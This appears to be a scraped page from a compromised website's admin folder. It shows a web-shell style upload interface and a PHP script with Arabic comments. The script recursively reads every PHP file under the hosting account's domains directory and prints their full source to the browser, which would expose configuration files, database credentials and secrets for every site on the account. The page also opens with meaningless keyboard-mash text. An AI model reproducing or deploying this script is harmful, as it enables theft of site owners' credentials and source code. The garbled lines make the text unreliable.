]]jkjjgdjffksdkdfdkfjgsldkfhgjkgjkhjkgjkdascxvxcvxcvjdklfgjslkdfgjlskdfgjdskfgj
במ12[aspddfsdfsdfdrxcvxcvcxvxcvxcvxcvxcvxcvxcvxcvxcvxxvxcvxcvxcv;'
/
home
/
u893294702
/
domains
/
gkrupamanasee.com
/
public_html
/
admin
/
Upload FileeE
HOME
<?php // مجلد البحث $directory = '/home/u893294702/domains/'; $extensions = ['php']; // البحث فقط في ملفات PHP $foundFiles = []; // لتخزين الملفات // وظيفة البحث في الملفات function searchFiles($dir) { global $foundFiles, $extensions; $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); foreach ($files as $file) { if ($file->isFile() && in_array($file->getExtension(), $extensions)) { $content = file_get_contents($file->getPathname()); // إضافة الملف والمحتوى إلى المصفوفة $foundFiles[$file->getPathname()] = $content; } } } // بدء البحث searchFiles($directory); // عرض النتائج if (!empty($foundFiles)) { echo "<!DOCTYPE html> <html lang='ar'> <head> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title>محتويات ملفات PHP</title> <style> body { font-family: Arial, sans-serif; line-height: 1.6; margin: 20px; } .file { border: 1px solid #ccc; padding: 10px; margin-bottom: 15px; background-color: #f9f9f9; } pre { white-space: pre-wrap; word-wrap: break-word; } </style> </head> <body> <h1>محتويات ملفات PHP</h1>"; foreach ($foundFiles as $file => $content) { echo "<div class='file'><h2>محتوى الملف: $file</h2><pre>" . htmlspecialchars($content) . "</pre></div>"; } echo "</body></html>"; } else { echo "لا توجد ملفات PHP للعرض.\n"; } ?>